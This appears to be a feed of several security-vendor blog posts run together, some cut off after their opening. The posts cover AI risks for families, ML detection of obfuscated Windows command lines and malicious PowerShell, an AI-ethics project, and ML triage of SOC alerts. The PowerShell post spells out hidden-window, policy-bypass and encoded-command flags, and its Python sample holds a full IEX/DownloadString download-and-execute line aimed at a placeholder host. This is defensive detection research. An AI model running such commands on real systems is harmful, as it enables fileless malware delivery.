And there’s tons of AI-generated good going on. Instagram — the #2 most popular social network — is now using AI technology to detect and combat cyberbullying in both comments and photos.

No doubt, AI is having a significant impact on everyday life and is positioned to transform the future.

Still, there are concerns. The self-driving cars. The robots that malfunction. The potential jobs lost to AI robots.

So, as quickly as this popular new technology is being applied, now is a great time to talk with your family about both the exciting potential of AI and the risks that may come with it.

Talking points for families

Fake videos, images. AI is making it easier for people to face swap within images and videos. A desktop application called FakeApp allows users to seamlessly swap faces and share fake videos and images. This has led to the rise in “deep fake” videos that appear remarkably realistic (many of which go viral). Tip: Talk to your family about the power of AI technology and the responsibility and critical thinking they must exercise as they consume and share online content.

Privacy breaches. Following the Cambridge Analytica/Facebook scandal of 2018 that allegedly used AI technology unethically to collect Facebook user data, we’re reminded of those out to gather our private (and public) information for financial or political gain. Tip: Discuss locking down privacy settings on social networks and encourage your kids to be hyper mindful about the information they share in the public feed. That information includes liking and commenting on other content — all of which AI technology can piece together into a broader digital picture for misuse.

Cybercrime. As outlined in McAfee’s 2019 Threats Prediction Report, AI technology will likely allow hackers more ease to bypass security measures on networks undetected. This can lead to data breaches, malware attacks, ransomware, and other criminal activity. Additionally, AI-generated phishing emails are scamming people into handing over sensitive data. Tip: Bogus emails can be highly personalized and trick intelligent users into clicking malicious links. Discuss the sophistication of the AI-related scams and warn your family to think about every click — even those from friends.

IoT security. With homes becoming “smarter” and equipped with AI-powered IoT products, the opportunity for hackers to get into these devices to steal sensitive data is growing. According to McAfee’s Threat Prediction Report, voice-activated assistants are especially vulnerable as a point-of-entry for hackers. Also at risk, say security experts, are routers, smartphones, and tablets. Tip: Be sure to keep all devices updated. Secure all of your connected devices and your home internet at its source — the network. Avoid routers that come with your ISP (Internet Service Provider) since they are often less secure. And, be sure to change the default password and secure your primary network and guest network with strong passwords.

The post AI & Your Family: The Wows and Potential Risks appeared first on McAfee Blogs.

Obfuscated Command Line Detection Using Machine Learning

This blog post presents a machine learning (ML) approach to solving an emerging security problem: detecting obfuscated Windows command line invocations on endpoints. We start out with an introduction to this relatively new threat capability, and then discuss how such problems have traditionally been handled. We then describe a machine learning approach to solving this problem and point out how ML vastly simplifies development and maintenance of a robust obfuscation detector. Finally, we present the results obtained using two different ML techniques and compare the benefits of each.

Introduction

Malicious actors are increasingly “living off the land,” using built-in utilities such as PowerShell and the Windows Command Processor (cmd.exe) as part of their infection workflow in an effort to minimize the chance of detection and bypass whitelisting defense strategies. The release of new obfuscation tools makes detection of these threats even more difficult by adding a layer of indirection between the visible syntax and the final behavior of the command. For example, Invoke-Obfuscation and Invoke-DOSfuscation are two recently released tools that automate the obfuscation of PowerShell and Windows command lines respectively.

The traditional pattern matching and rule-based approaches for detecting obfuscation are difficult to develop and generalize, and can pose a huge maintenance headache for defenders. We will show how using ML techniques can address this problem.

Detecting obfuscated command lines is a very useful technique because it allows defenders to reduce the data they must review by providing a strong filter for possibly malicious activity. While there are some examples of “legitimate” obfuscation in the wild, in the overwhelming majority of cases, the presence of obfuscation generally serves as a signal for malicious intent.

Background

There has been a long history of obfuscation being employed to hide the presence of malware, ranging from encryption of malicious payloads (starting with the Cascade virus) and obfuscation of strings, to JavaScript obfuscation. The purpose of obfuscation is two-fold:

  • Make it harder to find patterns in executable code, strings or scripts that can easily be detected by defensive software.
  • Make it harder for reverse engineers and analysts to decipher and fully understand what the malware is doing.

In that sense, command line obfuscation is not a new problem – it is just that the target of obfuscation (the Windows Command Processor) is relatively new. The recent release of tools such as Invoke-Obfuscation (for PowerShell) and Invoke-DOSfuscation (for cmd.exe) has demonstrated just how flexible these commands are, and how even incredibly complex obfuscation will still run commands effectively.

There are two categorical axes in the space of obfuscated vs. non-obfuscated command lines: simple/complex and clear/obfuscated (see Figure 1 and Figure 2). For this discussion, “simple” means generally short and relatively uncomplicated, but can still contain obfuscation, while “complex” means long, complicated strings that may or may not be obfuscated. Thus, the simple/complex axis is orthogonal to obfuscated/unobfuscated. The interplay of these two axes produces many boundary cases where simple heuristics to detect if a script is obfuscated (e.g. length of a command) will produce false positives on unobfuscated samples. The flexibility of the command line processor makes classification a difficult task from an ML perspective.


Figure 1: Dimensions of obfuscation


Figure 2: Examples of weak and strong obfuscation

Traditional Obfuscation Detection

Traditional obfuscation detection can be split into three approaches. One approach is to write a large number of complex regular expressions to match the most commonly abused syntax of the Windows command line. Figure 3 shows one such regular expression that attempts to match ampersand chaining with a call command, a common pattern seen in obfuscation. Figure 4 shows an example command sequence this regex is designed to detect.
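Since the image is not reproduced here, the snippet below gives an illustrative approximation (not FireEye's actual rule) of a regex aimed at ampersand chaining combined with the call command:

```python
import re

# Illustrative approximation of a rule that flags ampersand chaining with 'call',
# e.g.  cmd /c "set x=echo&& call %x% hello"
ampersand_call = re.compile(r"&&?\s*call\s+%\w+%", re.IGNORECASE)

print(bool(ampersand_call.search('cmd /c "set x=echo&& call %x% hello"')))   # True: matches the pattern
print(bool(ampersand_call.search('cmd /c "set x=echo&& c^all %x% hello"')))  # False: one caret evades it
```

The second example previews the weakness discussed below: a single stray caret is enough to slip past the rule.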


Figure 3: A common obfuscation pattern captured as a regular expression


Figure 4: A common obfuscation pattern (calling echo in obfuscated fashion in this example)

There are two problems with this approach. First, it is virtually impossible to develop regular expressions to cover every possible abuse of the command line. The flexibility of the command line results in a non-regular language, which is feasible yet impractical to express using regular expressions. A second issue with this approach is that even if a regular expression exists for the technique a malicious sample is using, a determined attacker can make minor modifications to avoid the regular expression. Figure 5 shows a minor modification to the sequence in Figure 4, which avoids the regex detection.


Figure 5: A minor change (extra carets) to an obfuscated command line that breaks the regular expression in Figure 3

The second approach, which is closer to an ML approach, involves writing complex if-then rules. However, these rules are hard to derive, are complex to verify, and pose a significant maintenance burden as authors evolve to escape detection by such rules. Figure 6 shows one such if-then rule.


Figure 6: An if-then rule that *may* indicate obfuscation (notice how loose this rule is, and how false positives are likely)

A third approach is to combine regular expressions and if-then rules. This greatly complicates the development and maintenance burden, and still suffers from the same weaknesses that make the first two approaches fragile. Figure 7 shows an example of an if-then rule with regular expressions. Clearly, it is easy to appreciate how burdensome it is to generate, test, maintain and determine the efficacy of such rules.


Figure 7: A combination of an if-then rule with regular expressions to detect obfuscation (a real hand-built obfuscation detector would consist of tens or hundreds of rules and still have gaps in its detection)

The ML Approach – Moving Beyond Pattern Matching and Rules

Using ML simplifies the solution to these problems. We will illustrate two ML approaches: a feature-based approach and a feature-less end-to-end approach.

There are some ML techniques that can work with any kind of raw data (provided it is numeric), and neural networks are a prime example. Most other ML algorithms require the modeler to extract pertinent information, called features, from raw data before they are fed into the algorithm. Some examples of this latter type are tree-based algorithms, which we will also look at in this blog (we described the structure and uses of Tree-Based algorithms in a previous blog post, where we used a Gradient-Boosted Tree-Based Model).

ML Basics – Neural Networks

Neural networks are a type of ML algorithm that have recently become very popular and consist of a series of elements called neurons. A neuron is essentially an element that takes a set of inputs, computes a weighted sum of these inputs, and then feeds the sum into a non-linear function. It has been shown that a relatively shallow network of neurons can approximate any continuous mapping between input and output. The specific type of neural network we used for this research is what is called a Convolutional Neural Network (CNN), which was developed primarily for computer vision applications, but has also found success in other domains including natural language processing. One of the main benefits of a neural network is that it can be trained without having to manually engineer features.

Featureless ML

While neural networks can be used with feature data, one of the attractions of this approach is that it can work with raw data (converted into numeric form) without doing any feature design or extraction. The first step in the model is converting text data into numeric form. We used a character-based encoding where each character type was encoded by a real valued number. The value was automatically derived during training and conveys semantic information about the relationships between characters as they apply to cmd.exe syntax.

Feature-Based ML

We also experimented with hand-engineered features and a Gradient Boosted Decision Tree algorithm. The features developed for this model were largely statistical in nature – derived from the presence and frequency of character sets and keywords. For example, the presence of dozens of ‘%’ characters or long, contiguous strings might contribute to detecting potential obfuscation. While any single feature will not perfectly separate the two classes, a combination of features as present in a tree-based model can learn flexible patterns in the data. The expectation is that those patterns are robust and can generalize to future obfuscation variants.

Data and Experiments

To develop our models, we collected non-obfuscated data from tens of thousands of endpoint events and generated obfuscated data using a variety of methods in Invoke-DOSfuscation. We developed our models using roughly 80 percent of the data as training data, and tested them on the remaining 20 percent. We ensured that our train-test split was stratified. For featureless ML (i.e. neural networks), we simply input Unicode code points into the first layer of the CNN model. The first layer converts the code point into semantically meaningful numerical representations (called embeddings) before feeding it into the rest of the neural network.
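A minimal sketch of such a character-level CNN, written with Keras, is shown below. The fixed command-line length, vocabulary size, and layer dimensions are assumptions for illustration, not the actual FireEye architecture.

```python
import numpy as np
from tensorflow.keras import layers, models

MAX_LEN = 200      # assumed fixed length: command lines are truncated or zero-padded
VOCAB_SIZE = 256   # assumed: characters bucketed into 256 ids

def encode(command_line):
    """Map each character to an integer id and pad to MAX_LEN."""
    ids = [min(ord(c), VOCAB_SIZE - 1) for c in command_line[:MAX_LEN]]
    return np.array(ids + [0] * (MAX_LEN - len(ids)))

model = models.Sequential([
    layers.Embedding(VOCAB_SIZE, 32),            # learned character embeddings
    layers.Conv1D(64, kernel_size=5, activation="relu"),
    layers.GlobalMaxPooling1D(),
    layers.Dense(32, activation="relu"),
    layers.Dense(1, activation="sigmoid"),       # output: P(obfuscated)
])
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=["accuracy"])

# X: encoded command lines, y: 1 for obfuscated, 0 for clean (from a labeled corpus).
# model.fit(X, y, validation_split=0.2, epochs=5)
```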

For the Gradient Boosted Tree method, we generated a number of features from the raw command lines. The following are some of them:

  • Length of the command line
  • The number of carets in the command line
  • The count of pipe symbols
  • The fraction of white space in the command line
  • The fraction of special characters
  • Entropy of the string
  • The frequency of the strings “cmd” and “power” in the command line

While each of these features individually is a weak signal and could not possibly be a good discriminator on its own, a flexible classifier such as a Gradient Boosted Tree – trained on sufficient data with these features – is able to classify obfuscated and non-obfuscated command lines in spite of the aforementioned difficulties.
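A sketch of how such hand-engineered features might be extracted is shown below; the exact feature set is a simplified assumption, and the resulting vectors would be fed to a gradient boosted tree implementation such as scikit-learn's GradientBoostingClassifier.

```python
import math
import re
from collections import Counter

def shannon_entropy(text):
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values()) if text else 0.0

def extract_features(cmd):
    """Turn a raw command line into the kind of statistical features listed above."""
    length = max(len(cmd), 1)
    return [
        len(cmd),                                           # length of the command line
        cmd.count("^"),                                     # number of carets
        cmd.count("|"),                                     # count of pipe symbols
        sum(c.isspace() for c in cmd) / length,             # fraction of white space
        len(re.findall(r"[^\w\s]", cmd)) / length,          # fraction of special characters
        shannon_entropy(cmd),                               # entropy of the string
        cmd.lower().count("cmd"),                           # frequency of "cmd"
        cmd.lower().count("power"),                         # frequency of "power"
    ]

print(extract_features('cmd /c "echo hello"'))
print(extract_features('c^m^d /c "ec^h^o he^l^lo"'))  # more carets and special characters
```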

Results

Evaluated against our test set, we were able to get nearly identical results from our Gradient Boosted Tree and neural network models.

The results for the GBT model were near perfect with metrics such as F1-score, precision, and recall all being close to 1.0. The CNN model was slightly less accurate.

While we certainly do not expect perfect results in a real-world scenario, these lab results were nonetheless encouraging. Recall that all of our obfuscated examples were generated by one source, namely the Invoke-DOSfuscation tool. While Invoke-DOSfuscation generates a wide variety of obfuscated samples, in the real world we expect to see at least some samples that are quite dissimilar from any that Invoke-DOSfuscation generates. We are currently collecting real world obfuscated command lines to get a more accurate picture of the generalizability of this model on obfuscated samples from actual malicious actors. We expect that command obfuscation, similar to PowerShell obfuscation before it, will continue to emerge in new malware families.

As an additional test we asked Daniel Bohannon (author of Invoke-DOSfuscation, the Windows command line obfuscation tool) to come up with obfuscated samples that in his experience would be difficult for a traditional obfuscation detector. In every case, our ML detector was still able to detect obfuscation. Some examples are shown in Figure 8.


Figure 8: Some examples of obfuscated text used to test and attempt to defeat the ML obfuscation detector (all were correctly identified as obfuscated text)

We also created very cryptic looking texts that, although valid Windows command lines and non-obfuscated, appear slightly obfuscated to a human observer. This was done to test efficacy of the detector with boundary examples. The detector was correctly able to classify the text as non-obfuscated in this case as well. Figure 9 shows one such example.


Figure 9: An example that appears on first glance to be obfuscated, but isn't really and would likely fool a non-ML solution (however, the ML obfuscation detector currently identifies it as non-obfuscated)

Finally, Figure 10 shows a complicated yet non-obfuscated command line that is correctly classified by our obfuscation detector, but would likely fool a non-ML detector based on statistical features (for example a rule-based detector with a hand-crafted weighing scheme and a threshold, using features such as the proportion of special characters, length of the command line or entropy of the command line).


Figure 10: An example that would likely be misclassified by an ML detector that uses simplistic statistical features; however, our ML obfuscation detector currently identifies it as non-obfuscated

CNN vs. GBT Results

We compared the results of a heavily tuned GBT classifier built using carefully selected features to those of a CNN trained with raw data (featureless ML). While the CNN architecture was not heavily tuned, it is interesting to note that with samples such as those in Figure 10, the GBT classifier confidently predicted non-obfuscated, assigning only a 19.7 percent probability of obfuscation. Meanwhile, the CNN classifier predicted non-obfuscated with a confidence probability of 50 percent – right at the boundary between obfuscated and non-obfuscated. The CNN model also produced more misclassifications than the Gradient Boosted Tree model. Both of these results are most likely due to inadequate tuning of the CNN, and not a fundamental shortcoming of the featureless approach.

Conclusion

In this blog post we described an ML approach to detecting obfuscated Windows command lines, which can be used as a signal to help identify malicious command line usage. Using ML techniques, we demonstrated a highly accurate mechanism for detecting such command lines without resorting to the often inadequate and costly technique of maintaining complex if-then rules and regular expressions. The more comprehensive ML approach is flexible enough to catch new variations in obfuscation, and when gaps are detected, it can usually be handled by adding some well-chosen evader samples to the training set and retraining the model.

This successful application of ML is yet another demonstration of the usefulness of ML in replacing complex manual or programmatic approaches to problems in computer security. In the years to come, we anticipate that ML will take an increasingly important role both at FireEye and in the rest of the cyber security industry.

Ethics In Artificial Intelligence: Introducing The SHERPA Consortium

In May of this year, Horizon 2020 SHERPA project activities kicked off with a meeting in Brussels. F-Secure is a partner in the SHERPA consortium – a group consisting of 11 members from six European countries – whose mission is to understand how the combination of artificial intelligence and big data analytics will impact ethics and human rights issues today, and in the future (https://www.project-sherpa.eu/).

As part of this project, one of F-Secure’s first tasks will be to study security issues, dangers, and implications of the use of data analytics and artificial intelligence, including applications in the cyber security domain. This research project will examine:

  • ways in which machine learning systems are commonly mis-implemented (and recommendations on how to prevent this from happening)
  • ways in which machine learning models and algorithms can be adversarially attacked (and mitigations against such attacks)
  • how artificial intelligence and data analysis methodologies might be used for malicious purposes

We’ve already done a fair bit of this research*, so expect to see more articles on this topic in the near future!

 

As strange as it sounds, I sometimes find PowerPoint a good tool for arranging my thoughts, especially before writing a long document. As an added bonus, I have a presentation ready to go, should I need it.

 

 

Some members of the SHERPA project recently attended WebSummit in Lisbon – a four-day event with over 70,000 attendees and over 70 dedicated discussions and panels. Topics related to artificial intelligence were prevalent this year, ranging from tech presentations on how to develop better AI, to existential debates on the implications of AI for the environment and humanity. The event attracted a wide range of participants, including many technologists, politicians, and NGOs.

During WebSummit, SHERPA members participated in the Social Innovation Village, where they joined forces with projects and initiatives such as Next Generation Internet, CAPPSI, MAZI, DemocratieOuverte, grassroots radio, and streetwize to push for “more social good in technology and more technology in social good”. Here, SHERPA researchers showcased the work they’ve already done to deepen the debate on the implications of AI in policing, warfare, education, health and social care, and transport.

The presentations attracted the keen interest of representatives from more than 100 large and small organizations and networks in Europe and further afield, including the likes of Founder’s Institute, Google, and Amazon, and also led to a public commitment by Carlos Moedas, the European Commissioner for Research, Science and Innovation. You can listen to the highlights of the conversation here.

To get a preview of SHERPA’s scenario work and take part in the debate, click here.

 


* If you’re wondering why I haven’t blogged in a long while, it’s because I’ve been hiding away, working on a bunch of AI-related research projects (such as this). Down the road, I’m hoping to post more articles and code – if and when I have results to share 😉

AI and the future of cybersecurity work

In February 2014, journalist Martin Wolf wrote a piece for the London Financial Times[1] titled Enslave the robots and free the poor. He began the piece with the following quote:

“In 1955, Walter Reuther, head of the US car workers’ union, told of a visit to a new automatically operated Ford plant. Pointing to all the robots, his host asked: How are you going to collect union dues from those guys? Mr. Reuther replied: And how are you going to get them to buy Fords?”

Near and long-term directions for adversarial AI in cybersecurity

The frenetic pace at which artificial intelligence (AI) has advanced in the past few years has begun to have transformative effects across a wide variety of fields. Coupled with an increasingly (inter)-connected world in which cyberattacks occur with alarming frequency and scale, it is no wonder that the field of cybersecurity has now turned its eye to AI and machine learning (ML) in order to detect and defend against adversaries.

The use of AI in cybersecurity not only expands the scope of what a single security expert is able to monitor, but importantly, it also enables the discovery of attacks that would have otherwise been undetectable by a human. Just as it was nearly inevitable that AI would be used for defensive purposes, it is undeniable that AI systems will soon be put to use for attack purposes.

Choosing an optimal algorithm for AI in cybersecurity

In the last blog post, we alluded to the No-Free-Lunch (NFL) theorems for search and optimization. While NFL theorems are criminally misunderstood and misrepresented in the service of crude generalizations intended to make a point, I intend to deploy a crude NFL generalization to make just such a point.

You see, NFL theorems (roughly) state that given a universe of problem sets where an algorithm’s goal is to learn a function that maps a set of input data X to a set of target labels Y, for any subset of problems where algorithm A outperforms algorithm B, there will be a subset of problems where B outperforms A. In fact, averaging their results over the space of all possible problems, the performance of algorithms A and B will be the same.
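In Wolpert and Macready’s formulation (paraphrased here as a rough sketch rather than a precise restatement), the result for any two algorithms a1 and a2 can be written in LaTeX as:

\sum_{f} P(d_m^y \mid f, m, a_1) = \sum_{f} P(d_m^y \mid f, m, a_2)

where f ranges over all possible objective functions and d_m^y denotes the sequence of m cost values the algorithm has sampled: averaged over every possible problem, neither algorithm comes out ahead.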

With some hand waving, we can construct an NFL theorem for the cybersecurity domain:  Over the set of all possible attack vectors that could be employed by a hacker, no single detection algorithm can outperform all others across the full spectrum of attacks.

Malicious PowerShell Detection via Machine Learning

Introduction

Cyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to install backdoors, execute malicious code, and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.

In this post you will learn:

  • Why malicious PowerShell can be challenging to detect with a traditional “signature-based” or “rule-based” detection engine.
  • How Natural Language Processing (NLP) can be applied to tackle this challenge.
  • How our NLP model detects malicious PowerShell commands, even if obfuscated.
  • The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.

Background

PowerShell is one of the most popular tools used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).


Figure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 – blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series

FireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the tactics, techniques and procedures (TTPs) used in PowerShell attacks, as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to improve PowerShell logging, which gives greater visibility into potential attacker activity. More recently, our in-depth report on APT32 highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.


Figure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain

Let’s take a deep dive into an example of a malicious PowerShell command (Figure 3).


Figure 3: Example of a malicious PowerShell command

The following is a quick explanation of the arguments:

  • -NoProfile – indicates that the current user’s profile setup script should not be executed when the PowerShell engine starts.
  • -NonI – shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.
  • -W Hidden – shorthand for “-WindowStyle Hidden”, which indicates that the PowerShell session window should be started in a hidden manner.
  • -Exec Bypass – shorthand for “-ExecutionPolicy Bypass”, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn’t meant to be a security boundary.
  • -encodedcommand – indicates the following chunk of text is a base64 encoded command.
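Because -encodedcommand expects Base64 over UTF-16LE text, such payloads can also be decoded outside of PowerShell. Here is a minimal Python sketch (the payload below is a made-up placeholder, not the command from Figure 3):

import base64

def decode_encodedcommand(payload):
  # PowerShell's -encodedcommand takes Base64-encoded UTF-16LE text.
  return base64.b64decode(payload).decode("utf-16-le")

# Hypothetical payload for illustration only:
sample = base64.b64encode(u"IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')".encode("utf-16-le")).decode("ascii")
print(decode_encodedcommand(sample))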

What is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.


Figure 4: The decoded command for the aforementioned example

Interestingly, the decoded command reveals stealthy, fileless network access and remote content execution!

  • IEX is an alias for the Invoke-Expression cmdlet that will execute the command provided on the local machine.
  • The new-object cmdlet creates an instance of a .NET Framework or COM object, here a net.webclient object.
  • The downloadstring method downloads the contents from <url> into a memory buffer (which IEX then executes).

It’s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting CVE-2017-10271 to deliver a cryptocurrency miner. In that attack, the exploit was leveraged to deliver a PowerShell script instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.

There are several reasons why adversaries prefer PowerShell:

  1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.
  2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.
  3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.

Additionally, from an economics perspective:

  • Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with open source obfuscation tools.
  • Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.

Next, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.

Natural Language Processing for Detecting Malicious PowerShell

Can we use machine learning to predict if a PowerShell command is malicious?

One advantage FireEye has is our repository of high quality PowerShell examples that we harvest from our global deployments of FireEye solutions and services. Working closely with our in-house PowerShell experts, we curated a large training set composed of malicious commands, as well as benign commands found in enterprise networks.

After we reviewed the PowerShell corpus, we quickly realized this fit nicely into the NLP problem space. We have built an NLP model that interprets PowerShell command text, similar to how Amazon Alexa interprets your voice commands.

One of the technical challenges we tackled was synonymy, a problem studied in linguistics. For instance, “NOL”, “NOLO”, and “NOLOGO” have identical semantics in PowerShell syntax. In NLP, a stemming algorithm reduces a word to its base form, such as “Innovating” being stemmed to “Innovate”.

We created a prefix-tree based stemmer for the PowerShell command syntax using an efficient data structure known as a trie, as shown in Figure 5. Even in a complex scripting language such as PowerShell, a trie can stem command tokens in nanoseconds.


Figure 5: Synonyms in the PowerShell syntax (left) and the trie stemmer capturing these equivalences (right)
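To make the idea concrete, the following is a minimal Python sketch of a trie-based stemmer (illustrative only – not the implementation described above – and seeded with just a few canonical parameter names):

class TrieStemmer(object):
  # Maps unambiguous abbreviations of known tokens (e.g. "nol", "nolo")
  # to their canonical form (e.g. "nologo").
  def __init__(self, canonical_tokens):
    self.root = {}
    for token in canonical_tokens:
      node = self.root
      for ch in token:
        node = node.setdefault(ch, {})
      node["$"] = token  # marks the end of a canonical token

  def stem(self, token):
    node = self.root
    for ch in token.lower():
      if ch not in node:
        return token  # unknown token: leave it unchanged
      node = node[ch]
    while "$" not in node:
      children = [k for k in node if k != "$"]
      if len(children) != 1:
        return token  # ambiguous abbreviation: leave it unchanged
      node = node[children[0]]
    return node["$"]

stemmer = TrieStemmer(["nologo", "noninteractive", "noprofile"])
print(stemmer.stem("NOL"))   # nologo
print(stemmer.stem("NonI"))  # noninteractive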

The overall NLP pipeline we developed consists of the following key modules:

  • Decoder – Detects and decodes any encoded text.
  • Named Entity Recognition (NER) – Detects and recognizes entities such as IPs, URLs, email addresses, registry keys, etc.
  • Tokenizer – Tokenizes the PowerShell command into a list of tokens.
  • Stemmer – Stems tokens into semantically identical tokens, using the trie.
  • Vocabulary Vectorizer – Vectorizes the list of tokens into a machine learning friendly format.
  • Supervised Classifier – Binary classification algorithms: Kernel Support Vector Machine, Gradient Boosted Trees, and Deep Neural Networks.
  • Reasoning – The explanation of why the prediction was made, enabling analysts to validate predictions.

The following are the key steps when streaming the aforementioned example through the NLP pipeline:

  • Detect and decode the Base64 commands, if any
  • Recognize entities using Named Entity Recognition (NER), such as the <URL>
  • Tokenize the entire text, including both clear text and obfuscated commands
  • Stem each token, and vectorize them based on the vocabulary
  • Predict the malicious probability using the supervised learning model


Figure 6: NLP pipeline that predicts the malicious probability of a PowerShell command
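As a heavily simplified sketch, the vectorizer and classifier stages of such a pipeline could be wired together with scikit-learn as follows (the preprocess() helper is a hypothetical stand-in for the decoder, NER, tokenizer, and stemmer stages, and the tiny training corpus is made up):

from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.ensemble import GradientBoostingClassifier

def preprocess(command):
  # Hypothetical stand-in for decoding, entity recognition, and stemming.
  return command.lower()

pipeline = Pipeline([
  ("vectorizer", CountVectorizer(preprocessor=preprocess, token_pattern=r"\S+")),
  ("classifier", GradientBoostingClassifier()),
])

# Tiny made-up corpus: 1 = malicious, 0 = benign.
commands = ["powershell -nop -w hidden -encodedcommand <BASE64>",
            "powershell Get-ChildItem C:\\Users"]
labels = [1, 0]
pipeline.fit(commands, labels)
print(pipeline.predict_proba(["powershell -exec bypass iex <URL>"]))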

More importantly, we established a production end-to-end machine learning pipeline (Figure 7) so that we can constantly evolve with adversaries through re-labeling and re-training, and the release of the machine learning model into our products.


Figure 7: End-to-end machine learning production pipeline for PowerShell machine learning

Value Validated in the Field

We successfully implemented and optimized this machine learning model to a minimal footprint that fits into our research endpoint agent, which is able to make predictions in milliseconds on the host. Throughout 2018, we have deployed this PowerShell machine learning detection engine on incident response engagements. Early field validation has confirmed detections of malicious PowerShell attacks, including:

  • Commodity malware such as Kovter.
  • Red team penetration test activities.
  • New variants that bypassed legacy signatures but were detected by our machine learning model with high confidence.

The unique values brought by the PowerShell machine learning detection engine include:  

  • The machine learning model automatically learns the malicious patterns from the curated corpus. In contrast to traditional detection signature rule engines, which are Boolean expression and regex based, the NLP model has lower operation cost and significantly cuts down the release time of security content.
  • The model performs probabilistic inference on unknown PowerShell commands by the implicitly learned non-linear combinations of certain patterns, which increases the cost for the adversaries to bypass.

The ultimate value of this innovation is to evolve with the broader threat landscape, and to create a competitive edge over adversaries.

Acknowledgements

We would like to acknowledge:

  • Daniel Bohannon, Christopher Glyer and Nick Carr for the support on threat research.
  • Alex Rivlin, HeeJong Lee, and Benjamin Chang from FireEye Labs for providing the DTI statistics.
  • Research endpoint support from Caleb Madrigal.
  • The FireEye ICE-DS Team.

Reverse Engineering the Analyst: Building Machine Learning Models for the SOC

Many cyber incidents can be traced back to an original alert that was either missed or ignored by the Security Operations Center (SOC) or Incident Response (IR) team. While most analysts and SOCs are vigilant and responsive, the fact is they are often overwhelmed with alerts. If a SOC is unable to review all the alerts it generates, then sooner or later, something important will slip through the cracks.

The core issue here is scalability. It is far easier to create more alerts than to create more analysts, and the cyber security industry is far better at alert generation than resolution. More intel feeds, more tools, and more visibility all add to the flood of alerts. There are things that SOCs can and should do to manage this flood, such as increasing automation of forensic tasks (pulling PCAP and acquiring files, for example) and using aggregation filters to group alerts into similar batches. These are effective strategies and will help reduce the number of required actions a SOC analyst must take. However, the decisions the SOC makes still form a critical bottleneck. This is the “Analyze/Decide” block in Figure 1.


Figure 1: Basic SOC triage stages

In this blog post, we propose machine learning based strategies to help mitigate this bottleneck and take back control of the SOC. We have implemented these strategies in our FireEye Managed Defense SOC, and our analysts are taking advantage of this approach within their alert triaging workflow. In the following sections, we will describe our process to collect data, capture alert analysis, create a model, and build an efficacy workflow – all with the ultimate goal of automating alert triage and freeing up analyst time.

Reverse Engineering the Analyst

Every alert that comes into a SOC environment contains certain bits of information that an analyst uses to determine if the alert represents malicious activity. Often, there are well-paved analytical processes and pathways used when evaluating these forensic artifacts over time. We wanted to explore if, in an effort to truly scale our SOC operations, we could extract these analytical pathways, train a machine to traverse them, and potentially discover new ones.

Think of a SOC as a self-contained machine that inputs unlabeled alerts and outputs the alerts labeled as “malicious” or “benign”. How can we capture the analysis and determine that something is indeed malicious, and then recreate that analysis at scale? In other words, what if we could train a machine to make the same analytical decisions as an analyst, within an acceptable level of confidence?

Basic Supervised Model Process

The data science term for this is a “Supervised Classification Model”. It is “supervised” in the sense that it learns by being shown data already labeled as benign or malicious, and it is a “classification model” in the sense that once it has been trained, we want it to look at a new piece of data and make a decision between one of several discrete outcomes. In our case, we only want it to decide between two “classes” of alerts: malicious and benign.

In order to begin creating such a model, a dataset must be collected. This dataset forms the “experience” of the model, and is the information we will use to “train” the model to make decisions. In order to supervise the model, each unit of data must be labeled as either malicious or benign, so that the model can evaluate each observation and begin to figure out what makes something malicious versus what makes it benign. Typically, collecting a clean, labeled dataset is one of the hardest parts of the supervised model pipeline; however, in the case of our SOC, our analysts are constantly triaging (or “labeling”) thousands of alerts every week, and so we were lucky to have an abundance of clean, standardized, labeled alerts.

Once a labeled dataset has been defined, the next step is to define “features” that can be used to portray the information resident in each alert. A “feature” can be thought of as an aspect of a bit of information. For example, if the information is represented as a string, a natural “feature” could be the length of the string. The central idea behind building features for our alert classification model was to find a way to represent and record all the aspects that an analyst might consider when making a decision.

Building the model then requires choosing a model structure to use, and training the model on a subset of the total data available. The larger and more diverse the training data set, generally the better the model will perform. The remaining data is used as a “test set” to see if the trained model is indeed effective. Holding out this test set ensures the model is evaluated on samples it has never seen before, but for which the true labels are known.

Finally, it is critical to ensure there is a way to evaluate the efficacy of the model over time, as well as to investigate mistakes so that appropriate adjustments can be made. Without a plan and a pipeline to evaluate and retrain, the model will almost certainly decay in performance.

Feature Engineering

Before creating any of our own models, we interviewed experienced analysts and documented the information they typically evaluate before making a decision on an alert. Those interviews formed the basis of our feature extraction. For example, when an analyst says that reviewing an alert is “easy”, we ask: “Why? And what helps you make that decision?” It is this reverse engineering of sorts that gives insight into features and models we can use to capture analysis.

For example, consider a process execution event. An alert on a potentially malicious process execution may contain the following fields:

  • Process Path
